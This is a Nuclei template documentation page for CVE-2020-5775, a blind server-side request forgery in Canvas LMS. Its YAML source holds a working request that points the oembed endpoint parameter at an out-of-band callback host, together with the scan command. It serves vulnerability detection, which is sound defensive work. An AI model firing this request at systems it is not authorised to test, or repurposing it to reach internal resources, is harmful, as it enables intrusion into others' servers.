Skip to content
Nuclei Templates

Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery

ID: CVE-2020-5775

Severity: medium

Author: alph4byt3

Tags: cve,cve2020,ssrf,oast,blind,tenable,instructure

Description

Section titled “Description”

Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2020-5775


info:
  name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery
  author: alph4byt3
  severity: medium
  description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2020-49
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5775
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
    cvss-score: 5.8
    cve-id: CVE-2020-5775
    cwe-id: CWE-918
    epss-score: 0.00194
    epss-percentile: 0.57293
    cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: instructure
    product: canvas_learning_management_service
  tags: cve,cve2020,ssrf,oast,blind,tenable,instructure


http:
  - method: GET
    path:
      - "{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100a65f5d7390497288a21032229ed95c2dd83cb9773c1f3f53ef84dbe20205bb5c022100f2557349686c8a3c12a07f2a8b62fb04d4533c162ee262544dec7ad2e572c29a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-5775.yaml"

View on Github